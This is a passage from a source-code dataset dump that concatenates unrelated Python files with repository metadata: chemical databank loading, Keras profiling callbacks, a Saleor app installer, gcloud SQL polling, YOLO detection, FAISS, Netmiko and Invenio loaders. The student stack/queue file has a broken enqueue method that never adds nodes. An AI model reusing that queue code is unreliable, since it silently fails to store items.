int8_dtype = np.dtype(np.int8)
float_dtype_ids = set([id(float64_dtype), id(float32_dtype)])
int_dtype_ids = set([id(int64_dtype), id(int32_dtype), id(int16_dtype), id(int8_dtype)])
except:
pass
from chemicals.identifiers import CAS_to_int
# %% Loading data from local databanks
pd = None
df_sources = {}
load_cmds = {}
def make_df_sparse(df, non_sparse_columns=[]):
'''Take a dataframe, and convert any floating-point columns which are mostly
missing into sparse series. Return the resulting dataframe.
'''
sparse_float = pd.SparseDtype("float", nan)
for col, dtype in zip(df.columns, df.dtypes):
if col not in non_sparse_columns and id(dtype) in float_dtype_ids:
series_orig = df[col]
series_small = series_orig.astype(sparse_float)
if series_small.memory_usage() < series_orig.memory_usage():
df[col] = series_small
return df
def register_df_source(folder, name, sep='\t', index_col=0, csv_kwargs={},
postload=None, sparsify=False, int_CAS=False):
load_cmds[name] = (folder, name, sep, index_col, csv_kwargs, postload, sparsify, int_CAS)
'''The following flags will strip out the excess memory usage of redundant
chemical metadata information.
'''
try:
low_mem = bool(int(os.environ.get('CHEDL_LOW_MEMORY', '0')))
except:
low_mem = False
spurious_columns = set(['name', 'formula', 'MW', 'InChI', 'InChI_key', 'Chemical',
'Data Type', 'Uncertainty', 'Fluid', 'Name', 'Names', 'Name ',
'Formula', 'Formula '])
def load_df(key):
global pd
if pd is None:
import pandas as pd
folder, name, sep, index_col, csv_kwargs, postload, sparsify, int_CAS = load_cmds[key]
path = path_join(folder, name)
df = pd.read_csv(path, sep=sep, index_col=index_col, **csv_kwargs)
if postload: postload(df)
if sparsify:
df = make_df_sparse(df)
if low_mem:
for col_name in df.columns.values.tolist():
if col_name in spurious_columns:
df[col_name] = pd.Series([], dtype=float).astype(pd.SparseDtype("float", nan))
if int_CAS:
'''Most CAS numbers fit in 32 bits. Not all of them do though, for
example https://commonchemistry.cas.org/detail?cas_rn=2222298-66-8
or 2627558-64-7
The maximum value of an unsigned integer is 4294967295.
It would be possible to remove the check digit of the CAS number,
which would allow all 10-digit current CAS format integers to fit
into an unsigned integer.
https://www.cas.org/support/documentation/chemical-substances/faqs
CAS says they are only "up to ten digits". However, before 2008 all
CAS numbers were "up to nine digits"; and they are already 25% of the
way through 10 digits. It is only a matter of time before they add
another digit. At their current rate this will be in 2036, but it will
likely be well before that. Therefore, it does not justify removing
the check digit.
'''
df.index = pd.Index([CAS_to_int(s) for s in df.index], dtype=int64_dtype)
df_sources[key] = df
def data_source(key):
try:
return df_sources[key]
except KeyError:
load_df(key)
return df_sources[key]
# %% Retrieving data from files
def retrieve_from_df_dict(df_dict, index, key, method):
try:
df = df_dict[method]
except KeyError:
raise ValueError('Invalid method: %s, allowed methods are %s' %(
method, list(df_dict)))
except TypeError: # pragma: no cover
raise TypeError("Method must be a string, not a %s object" %(type(method).__name__))
return retrieve_from_df(df, index, key)
def retrieve_any_from_df_dict(df_dict, index, key):
for df in df_dict.values():
value = retrieve_from_df(df, index, key)
if value is not None: return value
def retrieve_from_df(df, index, key):
df_index = df.index
if df_index.dtype is int64_dtype and isinstance(index, str):
try: index = CAS_to_int(index)
except: pass
if index in df_index:
if isinstance(key, (int, str)):
return get_value_from_df(df, index, key)
else: # Assume its an iterable of strings
return [float(df.at[index, i]) for i in key]
def retrieve_any_from_df(df, index, keys):
df_index = df.index
if df_index.dtype is int64_dtype and isinstance(index, str):
try: index = CAS_to_int(index)
except: pass
if index not in df.index: return None
for key in keys:
value = df.at[index, key]
if not isnan(value):
try:
return float(value)
except: # pragma: no cover
return value
def get_value_from_df(df, index, key):
value = df.at[index, key]
try:
return None if isnan(value) else float(value)
except TypeError:
# Not a number
return value
def list_available_methods_from_df_dict(df_dict, index, key):
methods = []
int_index = None
for method, df in df_dict.items():
df_index = df.index
if df_index.dtype is int64_dtype and isinstance(index, str):
if int_index is None:
try:
int_index = CAS_to_int(index)
except:
int_index = 'skip'
elif int_index == 'skip':
continue
if (int_index in df_index) and not isnan(df.at[int_index, key]):
methods.append(method)
elif (index in df_index) and not isnan(df.at[index, key]):
methods.append(method)
return methods
def list_available_methods_from_df(df, index, keys_by_method):
if index in df.index:
return [method for method, key in keys_by_method.items()
if not pd.isnull(df.at[index, key])]
else:
return [] | 37.35545 | 94 | 0.657194 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,016 | 0.382644 |
0dd931b7114a74c84466bdcc4e2ddf5aa167ed20 | 4,604 | py | Python | official/utils/misc/keras_utils.py | baranshad/models | aaf008855e9764f32d974e86f8e1f9cfddfafd9a | [
"Apache-2.0"
] | 180 | 2018-09-20T07:27:40.000Z | 2022-03-19T07:55:42.000Z | official/utils/misc/keras_utils.py | baranshad/models | aaf008855e9764f32d974e86f8e1f9cfddfafd9a | [
"Apache-2.0"
] | 80 | 2018-09-26T18:55:56.000Z | 2022-02-10T02:03:26.000Z | official/utils/misc/keras_utils.py | baranshad/models | aaf008855e9764f32d974e86f8e1f9cfddfafd9a | [
"Apache-2.0"
] | 72 | 2018-08-30T00:49:15.000Z | 2022-02-15T23:22:40.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper functions for the Keras implementations of models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from tensorflow.python.eager import profiler
class BatchTimestamp(object):
"""A structure to store batch time stamp."""
def __init__(self, batch_index, timestamp):
self.batch_index = batch_index
self.timestamp = timestamp
def __repr__(self):
return "'BatchTimestamp<batch_index: {}, timestamp: {}>'".format(
self.batch_index, self.timestamp)
class TimeHistory(tf.keras.callbacks.Callback):
"""Callback for Keras models."""
def __init__(self, batch_size, log_steps):
"""Callback for logging performance (# examples/second).
Args:
batch_size: Total batch size.
log_steps: Interval of time history logs.
"""
self.batch_size = batch_size
super(TimeHistory, self).__init__()
self.log_steps = log_steps
# Logs start of step 0 then end of each step based on log_steps interval.
self.timestamp_log = []
def on_train_begin(self, logs=None):
self.record_batch = True
def on_train_end(self, logs=None):
self.train_finish_time = time.time()
def on_batch_begin(self, batch, logs=None):
if self.record_batch:
timestamp = time.time()
self.start_time = timestamp
self.record_batch = False
if batch == 0:
self.timestamp_log.append(BatchTimestamp(batch, timestamp))
def on_batch_end(self, batch, logs=None):
if batch % self.log_steps == 0:
timestamp = time.time()
elapsed_time = timestamp - self.start_time
examples_per_second = (self.batch_size * self.log_steps) / elapsed_time
if batch != 0:
self.record_batch = True
self.timestamp_log.append(BatchTimestamp(batch, timestamp))
tf.compat.v1.logging.info(
"BenchmarkMetric: {'num_batches':%d, 'time_taken': %f,"
"'examples_per_second': %f}" %
(batch, elapsed_time, examples_per_second))
def get_profiler_callback(model_dir, profile_steps, enable_tensorboard):
"""Validate profile_steps flag value and return profiler callback."""
profile_steps_error_message = (
'profile_steps must be a comma separated pair of positive integers, '
'specifying the first and last steps to be profiled.'
)
try:
profile_steps = [int(i) for i in profile_steps.split(',')]
except ValueError:
raise ValueError(profile_steps_error_message)
if len(profile_steps) != 2:
raise ValueError(profile_steps_error_message)
start_step, stop_step = profile_steps
if start_step < 0 or start_step > stop_step:
raise ValueError(profile_steps_error_message)
if enable_tensorboard:
tf.compat.v1.logging.warn(
'Both TensorBoard and profiler callbacks are used. Note that the '
'TensorBoard callback profiles the 2nd step (unless otherwise '
'specified). Please make sure the steps profiled by the two callbacks '
'do not overlap.')
return ProfilerCallback(model_dir, start_step, stop_step)
class ProfilerCallback(tf.keras.callbacks.Callback):
"""Save profiles in specified step range to log directory."""
def __init__(self, log_dir, start_step, stop_step):
super(ProfilerCallback, self).__init__()
self.log_dir = log_dir
self.start_step = start_step
self.stop_step = stop_step
def on_batch_begin(self, batch, logs=None):
if batch == self.start_step:
profiler.start()
tf.compat.v1.logging.info('Profiler started at Step %s', self.start_step)
def on_batch_end(self, batch, logs=None):
if batch == self.stop_step:
results = profiler.stop()
profiler.save(self.log_dir, results)
tf.compat.v1.logging.info(
'Profiler saved profiles for steps between %s and %s to %s',
self.start_step, self.stop_step, self.log_dir)
| 35.145038 | 80 | 0.701347 | 2,599 | 0.564509 | 0 | 0 | 0 | 0 | 0 | 0 | 1,740 | 0.377932 |
0ddaf186f436077344b9ec71e5a8e4c734247389 | 2,102 | py | Python | saleor/app/management/commands/install_app.py | greentornado/saleor | 7f58917957a23c4dd90b47214a4500c91c735dee | [
"CC-BY-4.0"
] | 3 | 2021-06-22T12:38:18.000Z | 2021-07-11T15:01:57.000Z | saleor/app/management/commands/install_app.py | greentornado/saleor | 7f58917957a23c4dd90b47214a4500c91c735dee | [
"CC-BY-4.0"
] | 111 | 2021-07-19T04:19:30.000Z | 2022-03-28T04:32:37.000Z | saleor/app/management/commands/install_app.py | aminziadna/saleor | 2e78fb5bcf8b83a6278af02551a104cfa555a1fb | [
"CC-BY-4.0"
] | 6 | 2021-11-08T16:43:05.000Z | 2022-03-22T17:31:16.000Z | import json
from typing import Any, Optional
import requests
from django.core.exceptions import ValidationError
from django.core.management import BaseCommand, CommandError
from django.core.management.base import CommandParser
from ....app.validators import AppURLValidator
from ....core import JobStatus
from ...installation_utils import install_app
from ...models import AppInstallation
from .utils import clean_permissions
class Command(BaseCommand):
help = "Used to install new app."
def add_arguments(self, parser: CommandParser) -> None:
parser.add_argument("manifest-url", help="Url with app manifest.", type=str)
parser.add_argument(
"--activate",
action="store_true",
dest="activate",
help="Activates the app after installation",
)
def validate_manifest_url(self, manifest_url: str):
url_validator = AppURLValidator()
try:
url_validator(manifest_url)
except ValidationError:
raise CommandError(f"Incorrect format of manifest-url: {manifest_url}")
def fetch_manifest_data(self, manifest_url: str) -> dict:
response = requests.get(manifest_url)
response.raise_for_status()
return response.json()
def handle(self, *args: Any, **options: Any) -> Optional[str]:
activate = options["activate"]
manifest_url = options["manifest-url"]
self.validate_manifest_url(manifest_url)
manifest_data = self.fetch_manifest_data(manifest_url)
permissions = clean_permissions(manifest_data.get("permissions", []))
app_job = AppInstallation.objects.create(
app_name=manifest_data["name"], manifest_url=manifest_url
)
if permissions:
app_job.permissions.set(permissions)
try:
app = install_app(app_job, activate)
except Exception as e:
app_job.status = JobStatus.FAILED
app_job.save()
raise e
token = app.tokens.first()
return json.dumps({"auth_token": token.auth_token})
| 33.365079 | 84 | 0.670314 | 1,671 | 0.794957 | 0 | 0 | 0 | 0 | 0 | 0 | 242 | 0.115128 |
0ddb425d77d3e2f51449abccb667b4f56a4ea4c5 | 7,290 | py | Python | google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/sql/operations.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/sql/operations.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/sql/operations.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2020-07-25T12:09:01.000Z | 2020-07-25T12:09:01.000Z | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utility functions for sql operations."""
import time
from apitools.base.py import exceptions
from googlecloudsdk.api_lib.sql import errors
from googlecloudsdk.core.console import progress_tracker as console_progress_tracker
from googlecloudsdk.core.util import retry
class _BaseOperations(object):
"""Common utility functions for sql operations."""
_PRE_START_SLEEP_SEC = 1
_INITIAL_SLEEP_MS = 2000
_MAX_WAIT_MS = 300000
_WAIT_CEILING_MS = 20000
_HTTP_MAX_RETRY_MS = 2000
@classmethod
def WaitForOperation(cls, sql_client, operation_ref, message):
"""Wait for a Cloud SQL operation to complete.
No operation is done instantly. Wait for it to finish following this logic:
First wait 1s, then query, then retry waiting exponentially more from 2s.
We want to limit to 20s between retries to maintain some responsiveness.
Finally, we want to limit the whole process to a conservative 300s. If we
get to that point it means something is wrong and we can throw an exception.
Args:
sql_client: apitools.BaseApiClient, The client used to make requests.
operation_ref: resources.Resource, A reference for the operation to poll.
message: str, The string to print while polling.
Returns:
True if the operation succeeded without error.
Raises:
OperationError: If the operation has an error code, is in UNKNOWN state,
or if the operation takes more than 300s.
"""
def ShouldRetryFunc(result, state):
# In case of HttpError, retry for up to _HTTP_MAX_RETRY_MS at most.
if isinstance(result, exceptions.HttpError):
if state.time_passed_ms > _BaseOperations._HTTP_MAX_RETRY_MS:
raise result
return True
# In case of other Exceptions, raise them immediately.
if isinstance(result, Exception):
raise result
# Otherwise let the retryer do it's job until the Operation is done.
return not result
with console_progress_tracker.ProgressTracker(
message, autotick=False) as pt:
time.sleep(_BaseOperations._PRE_START_SLEEP_SEC)
retryer = retry.Retryer(exponential_sleep_multiplier=2,
max_wait_ms=_BaseOperations._MAX_WAIT_MS,
wait_ceiling_ms=_BaseOperations._WAIT_CEILING_MS)
try:
retryer.RetryOnResult(cls.GetOperationStatus,
[sql_client, operation_ref],
{'progress_tracker': pt},
should_retry_if=ShouldRetryFunc,
sleep_ms=_BaseOperations._INITIAL_SLEEP_MS)
except retry.WaitException:
raise errors.OperationError(
('Operation {0} is taking longer than expected. You can continue '
'waiting for the operation by running `{1}`').format(
operation_ref,
cls.GetOperationWaitCommand(operation_ref)))
class OperationsV1Beta3(_BaseOperations):
"""Common utility functions for sql operations V1Beta3."""
@staticmethod
def GetOperationStatus(sql_client, operation_ref, progress_tracker=None):
"""Helper function for getting the status of an operation for V1Beta3 API.
Args:
sql_client: apitools.BaseApiClient, The client used to make requests.
operation_ref: resources.Resource, A reference for the operation to poll.
progress_tracker: progress_tracker.ProgressTracker, A reference for the
progress tracker to tick, in case this function is used in a Retryer.
Returns:
True: if the operation succeeded without error.
False: if the operation is not yet done.
OperationError: If the operation has an error code or is in UNKNOWN state.
Exception: Any other exception that can occur when calling Get
"""
if progress_tracker:
progress_tracker.Tick()
try:
op = sql_client.operations.Get(
sql_client.MESSAGES_MODULE.SqlOperationsGetRequest(
project=operation_ref.project,
instance=operation_ref.instance,
operation=operation_ref.operation))
except Exception as e: # pylint:disable=broad-except
# Since we use this function in a retryer.RetryOnResult block, where we
# retry for different exceptions up to different amounts of time, we
# have to catch all exceptions here and return them.
return e
if op.error:
return errors.OperationError(op.error[0].code)
if op.state == 'UNKNOWN':
return errors.OperationError(op.state)
if op.state == 'DONE':
return True
return False
@staticmethod
def GetOperationWaitCommand(operation_ref):
return 'gcloud sql operations wait -i {0} --project {1} {2}'.format(
operation_ref.instance, operation_ref.project, operation_ref.operation)
class OperationsV1Beta4(_BaseOperations):
"""Common utility functions for sql operations V1Beta4."""
@staticmethod
def GetOperationStatus(sql_client, operation_ref, progress_tracker=None):
"""Helper function for getting the status of an operation for V1Beta4 API.
Args:
sql_client: apitools.BaseApiClient, The client used to make requests.
operation_ref: resources.Resource, A reference for the operation to poll.
progress_tracker: progress_tracker.ProgressTracker, A reference for the
progress tracker to tick, in case this function is used in a Retryer.
Returns:
True: if the operation succeeded without error.
False: if the operation is not yet done.
OperationError: If the operation has an error code or is in UNKNOWN state.
Exception: Any other exception that can occur when calling Get
"""
if progress_tracker:
progress_tracker.Tick()
try:
op = sql_client.operations.Get(
sql_client.MESSAGES_MODULE.SqlOperationsGetRequest(
project=operation_ref.project,
operation=operation_ref.operation))
except Exception as e: # pylint:disable=broad-except
# Since we use this function in a retryer.RetryOnResult block, where we
# retry for different exceptions up to different amounts of time, we
# have to catch all exceptions here and return them.
return e
if op.error and op.error.errors:
return errors.OperationError(op.error.errors[0].code)
if op.status == 'UNKNOWN':
return errors.OperationError(op.status)
if op.status == 'DONE':
return True
return False
@staticmethod
def GetOperationWaitCommand(operation_ref):
return 'gcloud beta sql operations wait --project {0} {1}'.format(
operation_ref.project, operation_ref.operation)
| 40.276243 | 84 | 0.705898 | 6,405 | 0.878601 | 0 | 0 | 5,964 | 0.818107 | 0 | 0 | 3,914 | 0.5369 |
0ddb5907cfb4e23bc38acc79b824cb21a1af696d | 1,171 | py | Python | objectDetection/detect_images.py | pklink/python-opencv | b1bb82f1e3eccc8e5dcba9e5b595e5976435bdbe | [
"Apache-2.0"
] | 1 | 2022-01-19T14:01:09.000Z | 2022-01-19T14:01:09.000Z | objectDetection/detect_images.py | pklink/python-opencv | b1bb82f1e3eccc8e5dcba9e5b595e5976435bdbe | [
"Apache-2.0"
] | 1 | 2019-10-28T08:33:59.000Z | 2019-10-28T08:33:59.000Z | objectDetection/detect_images.py | pklink/python-opencv | b1bb82f1e3eccc8e5dcba9e5b595e5976435bdbe | [
"Apache-2.0"
] | 1 | 2019-10-28T08:26:38.000Z | 2019-10-28T08:26:38.000Z | import argparse
import glob
import os, shutil
import cv2
from YoloObjectDetector import YoloObjectDetector
parser = argparse.ArgumentParser(description="Detect Objects in all images in the given folder.")
parser.add_argument("-s", "--size", dest="size", default="320", type=str, help="Spatial Size (tiny, 320, 416, 608), default: 320")
parser.add_argument("input", type=str, help="Input folder.")
args = parser.parse_args()
modelSize = args.size
print("Using size " + modelSize)
detector = YoloObjectDetector(modelSize)
srcFolder = args.input
print("Using imagefolder " + srcFolder)
if os.path.exists("target"):
shutil.rmtree("target")
os.mkdir("target")
files = glob.glob(srcFolder + "/**/*.jpg", recursive=True)
numberFiles = len(files)
for idx, filename in enumerate(files):
print("{0:3.2f}% ({1:d}/{2:d})".format((100/numberFiles)*idx, idx, numberFiles))
if os.path.isfile(filename): # filter dirs
print(filename)
image = cv2.imread(filename)
image = detector.processImage(image)
if image is not None:
output = os.path.join("target", os.path.basename(filename))
cv2.imwrite(output, image)
| 30.815789 | 130 | 0.693424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 260 | 0.222032 |
0ddc0bef32477eced0900bb0111e6a1dbf4f7271 | 186 | py | Python | countries/api/urls.py | isidaruk/eurovision_project | 976743e66a2fed17c0513f17a9a7d35850e9cde5 | [
"MIT"
] | null | null | null | countries/api/urls.py | isidaruk/eurovision_project | 976743e66a2fed17c0513f17a9a7d35850e9cde5 | [
"MIT"
] | 8 | 2020-02-12T00:23:27.000Z | 2022-03-08T21:10:13.000Z | countries/api/urls.py | isidaruk/eurovision_project | 976743e66a2fed17c0513f17a9a7d35850e9cde5 | [
"MIT"
] | null | null | null | from rest_framework.routers import DefaultRouter
from countries.api.views import CountryViewSet
router = DefaultRouter()
router.register('', CountryViewSet)
urlpatterns = router.urls
| 20.666667 | 48 | 0.822581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0.010753 |
0ddcb23ab572dfee37d81ec252ad2030e3319efd | 1,675 | py | Python | python/code_challenges/stacks_and_queues/stacks_and_queues.py | brendanwelzien/data-structures-and-algorithms | 0bffe825e34de2e5c072b1e6b6c2cb1d7d1d61f5 | [
"MIT"
] | null | null | null | python/code_challenges/stacks_and_queues/stacks_and_queues.py | brendanwelzien/data-structures-and-algorithms | 0bffe825e34de2e5c072b1e6b6c2cb1d7d1d61f5 | [
"MIT"
] | 1 | 2020-11-10T01:31:39.000Z | 2020-11-10T01:31:39.000Z | python/code_challenges/stacks_and_queues/stacks_and_queues.py | brendanwelzien/data-structures-and-algorithms | 0bffe825e34de2e5c072b1e6b6c2cb1d7d1d61f5 | [
"MIT"
] | null | null | null | class Node:
def __init__(self, value, next_p=None):
self.next = next_p
self.value = value
def __str__(self):
return f'{self.value}'
class InvalidOperationError(Exception):
pass
class Stack:
def __init__(self):
self.top = None
def push(self, value):
current = self.top
if self.top == None:
self.top = Node(value)
else:
node_n = Node(value)
node_n.next = self.top
self.top = node_n
def pop(self):
if not self.top:
raise InvalidOperationError('Method not allowed on empty collection')
if self.top:
top_value = self.top
self.top = self.top.next
return top_value.value
def peek(self):
if not self.top:
raise InvalidOperationError("Method not allowed on empty collection")
return self.top.value
def is_empty(self):
return not self.top
class Queue:
def __init__(self):
self.f = None
self.r = None
def enqueue(self, value):
node = Node(value)
if self.r:
node = self.r.next
node = self.r
def dequeue(self):
if not self.f:
raise InvalidOperationError('Method not allowed on empty collection')
leave = self.f
if self.f == self.r:
self.r = None
self.f = self.f.next
return leave.value
def peek(self):
if not self.f:
raise InvalidOperationError('Method not allowed on empty collection')
return self.f.value
def is_empty(self):
return not self.f and not self.r
| 23.263889 | 81 | 0.560597 | 1,667 | 0.995224 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.104478 |
0ddf3f1c726adc70203174632e31094c4c2d0306 | 232 | py | Python | square/main.py | vishwamshuklaRazorpay/vishwam_test | b0925429385005dac37d92938b7daf6245d636c8 | [
"MIT"
] | null | null | null | square/main.py | vishwamshuklaRazorpay/vishwam_test | b0925429385005dac37d92938b7daf6245d636c8 | [
"MIT"
] | null | null | null | square/main.py | vishwamshuklaRazorpay/vishwam_test | b0925429385005dac37d92938b7daf6245d636c8 | [
"MIT"
] | null | null | null | def main():
number = int(input("Enter number (Only positive integer is allowed)"))
print(f'{number} square is {number ** 2}')
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
main()
| 25.777778 | 74 | 0.659483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 151 | 0.650862 |
0ddfe1e0014be1bb17e25a898cf24f24861860f8 | 1,869 | py | Python | src/GoTurnRemix.py | aakaashjois/Plant-Tracer | d56c8021665f419e08dddb1ac88d3a719b2c787a | [
"Apache-2.0"
] | null | null | null | src/GoTurnRemix.py | aakaashjois/Plant-Tracer | d56c8021665f419e08dddb1ac88d3a719b2c787a | [
"Apache-2.0"
] | 1 | 2022-02-05T09:35:32.000Z | 2022-02-05T09:35:32.000Z | src/GoTurnRemix.py | aakaashjois/Plant-Tracer | d56c8021665f419e08dddb1ac88d3a719b2c787a | [
"Apache-2.0"
] | 2 | 2019-07-28T11:10:31.000Z | 2021-05-19T02:27:39.000Z | import torch
from torchvision import models
from torch import nn
class GoTurnRemix(nn.Module):
"""
Create a model based on GOTURN. The GOTURN architecture used a CaffeNet while GoTurnRemix uses AlexNet.
The rest of the architecture is the similar to GOTURN. A PyTorch implementation of GOTURN can be found at:
https://github.com/aakaashjois/PyTorch-GOTURN
"""
def __init__(self):
super(GoTurnRemix, self).__init__()
# Load an AlexNet model pretrained on ImageNet
self.features = nn.Sequential(*list(models.alexnet(pretrained=True).children())[:-1])
# Freeze the pretrained layers
for param in self.features.parameters():
param.requires_grad = False
self.regressor = nn.Sequential(
nn.Linear(256 * 6 * 6 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4),
)
# Initialize the biases of the Linear layers to 1
# Initialize weights to a normal distribution with 0 mean and 0.005 standard deviation
for m in self.regressor.modules():
if isinstance(m, nn.Linear):
m.bias.data.fill_(1)
m.weight.data.normal_(0, 0.005)
def forward(self, previous, current):
previous_features = self.features(previous)
current_features = self.features(current)
# Flatten, concatenate and pass to regressor the features
return self.regressor(torch.cat((previous_features.view(previous_features.size(0), 256 * 6 * 6),
current_features.view(current_features.size(0), 256 * 6 * 6)), 1))
| 40.630435 | 114 | 0.612627 | 1,801 | 0.963617 | 0 | 0 | 0 | 0 | 0 | 0 | 561 | 0.300161 |
0de4d985008ec5f2946451370dc2a3228dbe91c7 | 609 | py | Python | python/examples/provenance/index_svc/buildrandom.py | xkortex/medifor | 2e715256ab170208255c935d1ae8e844ade27574 | [
"Apache-2.0"
] | 9 | 2019-09-16T20:37:37.000Z | 2021-07-26T05:04:36.000Z | python/examples/provenance/index_svc/buildrandom.py | xkortex/medifor | 2e715256ab170208255c935d1ae8e844ade27574 | [
"Apache-2.0"
] | 19 | 2019-10-28T22:18:56.000Z | 2022-03-12T00:08:34.000Z | python/examples/provenance/index_svc/buildrandom.py | xkortex/medifor-lite | 4567e16f59930417506e784e94f3fedb4afcc0c3 | [
"Apache-2.0"
] | 11 | 2019-08-02T18:56:43.000Z | 2021-04-05T20:32:55.000Z | #!/usr/bin/env python3
import faiss
import numpy as np
def main(outfile):
d = 100
nlist = 100
k = 4
nb = 100000
np.random.seed(1234)
xb = np.random.random((nb, d)).astype('float32')
xb[:, 0] += np.arange(nb) / 1000.
quantizer = faiss.IndexFlatL2(d)
index = faiss.IndexIVFFlat(quantizer, d, nlist)
index.train(xb)
index.add(xb)
faiss.write_index(index, outfile)
if __name__ == '__main__':
import argparse
a = argparse.ArgumentParser()
a.add_argument('outfile', type=str, help='output file')
args = a.parse_args()
main(args.outfile)
| 18.454545 | 59 | 0.627258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.103448 |
0de5d6a47d80b154cdbdae53819a355507f08a2e | 800 | py | Python | class3/exercises/exercise1.py | twin-bridges/netmiko_course | 31943e4f6f66dbfe523d62d5a2f03285802a8c56 | [
"Apache-2.0"
] | 11 | 2020-09-16T06:53:16.000Z | 2021-08-24T21:27:37.000Z | class3/exercises/exercise1.py | twin-bridges/netmiko_course | 31943e4f6f66dbfe523d62d5a2f03285802a8c56 | [
"Apache-2.0"
] | null | null | null | class3/exercises/exercise1.py | twin-bridges/netmiko_course | 31943e4f6f66dbfe523d62d5a2f03285802a8c56 | [
"Apache-2.0"
] | 5 | 2020-10-18T20:25:59.000Z | 2021-10-20T16:27:00.000Z | import os
from getpass import getpass
from pprint import pprint
from netmiko import ConnectHandler
# Code so automated tests will run properly
password = os.getenv("NETMIKO_PASSWORD") if os.getenv("NETMIKO_PASSWORD") else getpass()
arista1 = {
"device_type": "arista_eos",
"host": "arista1.lasthop.io",
"username": "pyclass",
"password": password,
}
with ConnectHandler(**arista1) as net_connect:
show_vlan = net_connect.send_command("show vlan", use_textfsm=True)
print()
print("VLAN Table:")
print("-" * 18)
pprint(show_vlan)
print()
for vlan_dict in show_vlan:
if vlan_dict["vlan_id"] == "7":
print()
print(f"VLAN ID: {vlan_dict['vlan_id']}")
print(f"VLAN name: {vlan_dict['name']}")
print()
| 25.806452 | 88 | 0.6425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 265 | 0.33125 |
0de6a3bbc2e8361502ee097dee7d73b1ea8c48de | 2,891 | py | Python | invenio_records_rest/loaders/marshmallow.py | Glignos/invenio-records-rest | 4020d9e8c8e21e7c760fa14f9c634636ef6fda38 | [
"MIT"
] | null | null | null | invenio_records_rest/loaders/marshmallow.py | Glignos/invenio-records-rest | 4020d9e8c8e21e7c760fa14f9c634636ef6fda38 | [
"MIT"
] | null | null | null | invenio_records_rest/loaders/marshmallow.py | Glignos/invenio-records-rest | 4020d9e8c8e21e7c760fa14f9c634636ef6fda38 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Marshmallow loader for record deserialization.
Use marshmallow schema to transform a JSON sent via the REST API from an
external to an internal JSON presentation. The marshmallow schema further
allows for advanced data validation.
"""
from __future__ import absolute_import, print_function
import json
from flask import request
from invenio_rest.errors import RESTValidationError
def _flatten_marshmallow_errors(errors):
"""Flatten marshmallow errors."""
res = []
for field, error in errors.items():
if isinstance(error, list):
res.append(
dict(field=field, message=' '.join([str(x) for x in error])))
elif isinstance(error, dict):
res.extend(_flatten_marshmallow_errors(error))
return res
class MarshmallowErrors(RESTValidationError):
"""Marshmallow validation errors.
Responsible for formatting a JSON response to a user when a validation
error happens.
"""
def __init__(self, errors):
"""Store marshmallow errors."""
self._it = None
self.errors = _flatten_marshmallow_errors(errors)
super(MarshmallowErrors, self).__init__()
def __str__(self):
"""Print exception with errors."""
return "{base}. Encountered errors: {errors}".format(
base=super(RESTValidationError, self).__str__(),
errors=self.errors)
def __iter__(self):
"""Get iterator."""
self._it = iter(self.errors)
return self
def next(self):
"""Python 2.7 compatibility."""
return self.__next__() # pragma: no cover
def __next__(self):
"""Get next file item."""
return next(self._it)
def get_body(self, environ=None):
"""Get the request body."""
body = dict(
status=self.code,
message=self.get_description(environ),
)
if self.errors:
body['errors'] = self.errors
return json.dumps(body)
def marshmallow_loader(schema_class):
"""Marshmallow loader for JSON requests."""
def json_loader():
request_json = request.get_json()
context = {}
pid_data = request.view_args.get('pid_value')
if pid_data:
pid, record = pid_data.data
context['pid'] = pid
context['record'] = record
result = schema_class(context=context).load(request_json)
if result.errors:
raise MarshmallowErrors(result.errors)
return result.data
return json_loader
def json_patch_loader():
"""Dummy loader for json-patch requests."""
return request.get_json(force=True)
| 27.798077 | 77 | 0.64303 | 1,210 | 0.41854 | 0 | 0 | 0 | 0 | 0 | 0 | 978 | 0.338291 |
0de9893144b5910f320fefedfcebe7eebec65b42 | 475 | py | Python | app/controllers/user.py | souravlahoti/GithubAction | 6cda8f4ab022f78df7539b32571c1406f8943ad5 | [
"MIT"
